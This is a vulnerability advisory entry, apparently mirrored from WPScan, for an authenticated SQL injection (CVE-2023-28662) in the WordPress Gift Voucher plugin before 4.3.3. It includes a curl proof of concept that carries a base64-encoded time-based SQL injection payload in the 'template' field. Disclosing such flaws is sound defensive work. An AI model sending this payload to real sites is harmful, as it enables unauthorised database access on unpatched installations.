Lucene search
WpvulndbWPVDB-ID:7AD59661-B43C-42FC-8575-4039312AB0B3HistoryMar 22, 2023 - 12:00 a.m.
Gift Voucher < 4.3.3 - Subscriber+ SQLi
2023-03-2200:00:00
wpscan.com
7
gift voucher
sql injection
wpgv_doajax_voucher_pdf_save_func
authenticated users
0.012 Low
EPSS
Percentile
85.2%
The plugin does not properly sanitise and escape the template parameter before using it in a SQL statement via the wpgv_doajax_voucher_pdf_save_func AJAX action, leading to a SQL injection exploitable by any authenticated users, such as subscriber
PoC
curl “http://$TARGET_HOST/wp-admin/admin-ajax.php” --data “action=wpgv_doajax_voucher_pdf_save_func&nonce;=af77cd5581&template;=KENBU0UgV0hFTiAoMTAxNj0xMDE2KSBUSEVOIFNMRUVQKDUpIEVMU0UgMTAxNiBFTkQp&buying;_for=&for;=&from;=&value;=&message;=&code;=&shipping;=&shipping;_email=&firstname;=&lastname;=&email;=&address;=&pincode;=&shipping;_method=&paymentmethod;=”
| CPE | Name | Operator | Version |
|---|---|---|---|
| gift-voucher | lt | 4.3.3 |
Related
cve
cve
CVE-2023-28662
2023-03-22 21:15:18
openvas
openvas
WordPress Gift Cards Plugin < 4.3.3 SQLi Vulnerability
2023-10-12 00:00:00
wpexploit
wpexploit
Gift Voucher < 4.3.3 - Subscriber+ SQLi
2023-03-22 00:00:00
prion
prion
Sql injection
2023-03-22 21:15:00
cvelist
cvelist
CVE-2023-28662
2023-03-22 00:00:00
nvd
nvd
CVE-2023-28662
2023-03-22 21:15:18
nuclei
nuclei
Wordpress Gift Cards <= 4.3.1 - SQL Injection
2024-02-04 10:48:42
wordfence
wordfence